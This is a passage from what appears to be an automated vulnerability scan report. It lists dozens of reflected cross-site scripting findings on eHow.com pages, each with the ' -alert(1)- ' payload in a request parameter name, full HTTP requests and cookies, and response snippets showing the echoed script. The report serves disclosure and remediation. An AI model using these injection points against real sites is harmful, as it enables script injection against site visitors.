Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91357
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Take Minutes at a Business Meeting | eHow.
...[SNIP]...
<script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_3815_minutes-business-mee
...[SNIP]...
1.394. http://www.ehow.com/how_4469163_edit-pdf-document.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_4469163_edit-pdf-document.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0dca'-alert(1)-'85cb027615b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4469163_edit-pdf-document.html?b0dca'-alert(1)-'85cb027615b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78940
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Edit a PDF Document | eHow.com</title>
1.395. http://www.ehow.com/how_4474239_make-graph-using-excel.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_4474239_make-graph-using-excel.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f436'-alert(1)-'4415fbcb8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94577
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Graph Using Excel | eHow.com</title ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_4474239_make-graph-using- ...[SNIP]...
1.396. http://www.ehow.com/how_4924781_open-pub-file-mac.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_4924781_open-pub-file-mac.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8f4c'-alert(1)-'1c3432371cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73508
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Open a Pub File on a Mac | eHow.com</title ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_4924781_open-pub-file-mac ...[SNIP]...
1.397. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5073161_convert-wps-file-extension.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa220'-alert(1)-'daadd8a210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5073161_convert-wps-file-extension.html?fa220'-alert(1)-'daadd8a210=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75425
1.398. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5215115_change-startup-programs-windows-7.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fab0'-alert(1)-'239e708e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5215115_change-startup-programs-windows-7.html?3fab0'-alert(1)-'239e708e54d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82368
1.399. http://www.ehow.com/how_5381925_make-roof-rake.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5381925_make-roof-rake.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'-alert(1)-'b133b6ee46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5381925_make-roof-rake.html?2c848'-alert(1)-'b133b6ee46a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74849
1.400. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5521182_avoid-seasonal-affective-disorder-sad.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64ee4'-alert(1)-'f456c4201c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5521182_avoid-seasonal-affective-disorder-sad.html?64ee4'-alert(1)-'f456c4201c4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87639
1.401. http://www.ehow.com/how_5809012_create-indoor-gardens.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5809012_create-indoor-gardens.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f6ce'-alert(1)-'4ee6a37a499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5809012_create-indoor-gardens.html?7f6ce'-alert(1)-'4ee6a37a499=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78342
1.402. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_6469141_improve-english-grammar-skills.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2cc'-alert(1)-'9bd54b7ec50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_6469141_improve-english-grammar-skills.html?de2cc'-alert(1)-'9bd54b7ec50=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76525
1.403. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_7496527_resolve-5-common-grammar-problems.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ccc4'-alert(1)-'eff1c631b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7496527_resolve-5-common-grammar-problems.html?6ccc4'-alert(1)-'eff1c631b84=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83128
1.404. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_7744253_attach-mini-shades-update-chandelier.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41305'-alert(1)-'0c6f72547ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73984
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Attach Mini Shades to Update a Chandelier ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_7744253_attach-mini-shade ...[SNIP]...
1.405. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_7856914_prevent-chimney-fires.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8e'-alert(1)-'76a29eab4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7856914_prevent-chimney-fires.html?fbf8e'-alert(1)-'76a29eab4ee=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72453
1.406. http://www.ehow.com/how_9191_program-rca-universal.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_9191_program-rca-universal.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a74c'-alert(1)-'8d434bae862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83715
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Program an RCA Universal Remote Control | ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_9191_program-rca-universa ...[SNIP]...
1.407. http://www.ehow.com/internet/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/internet/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d46d'-alert(1)-'33313014650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /internet/?7d46d'-alert(1)-'33313014650=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:19 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72670
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Internet - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/internet/?7d46d'-alert(1)-'33313014650=1" ref="like" width="300"> ...[SNIP]...
1.408. http://www.ehow.com/job-search-and-employment/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/job-search-and-employment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e424'-alert(1)-'d58b620fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-search-and-employment/?4e424'-alert(1)-'d58b620fb9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72349
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Job Search & Employment - How To Information | eH ...[SNIP]... <fb:like href="http://www.ehow.com/job-search-and-employment/?4e424'-alert(1)-'d58b620fb9=1" ref="like" width="300"> ...[SNIP]...
1.409. http://www.ehow.com/lawn-and-garden/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/lawn-and-garden/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9de4d'-alert(1)-'a2435ec230d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 67905
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lawn & Garden - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1" ref="like" width="300"> ...[SNIP]...
1.410. http://www.ehow.com/legal/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/legal/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c967'-alert(1)-'f0d7f914f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
